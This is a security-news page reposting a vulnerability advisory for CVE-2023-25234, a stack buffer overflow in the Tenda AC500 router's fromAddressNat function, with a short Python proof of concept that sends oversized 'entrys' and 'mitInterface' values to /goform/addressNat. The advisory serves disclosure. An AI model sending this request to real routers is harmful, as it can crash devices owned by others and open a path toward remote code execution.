Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2023-25234: Vluninfo_Repo/CNVDs/113_1 at main · Funcy33/Vluninfo_Repo

Tenda AC500 V2.0.1.9(1307) is vulnerable to Buffer Overflow in function fromAddressNat via parameters entrys and mitInterface.

CVE
Open in Source
#vulnerability#rce#buffer_overflow

Tenda Router AC500 Vulnerability

This vulnerability lies in the /goform/addressNat page which influences the lastest version of Tenda Router AC500. (The latest version is AC500_V2.0.1.9(1307))

Vulnerability Description

There is a stack-based buffer overflow vulnerability in function fromAddressNat.

In function fromAddressNat it reads 2 user provided parameters entrys and mitInterface into v8 and v7, and these two variables are passed into function sprintf without any length check, which may overflow the stack-based buffer s.

So by requesting the page /goform/addressNat, the attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

POC

import requests

IP = "10.10.10.1"
url = f"http://{IP}/goform/addressNat?"
url += "entrys=" + "s" * 0x200
url += "&mitInterface=" + "a" * 0x200

response = requests.get(url)

Timeline****Acknowledgment

Credit to @Funcy_kilar from Guangzhou University.

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE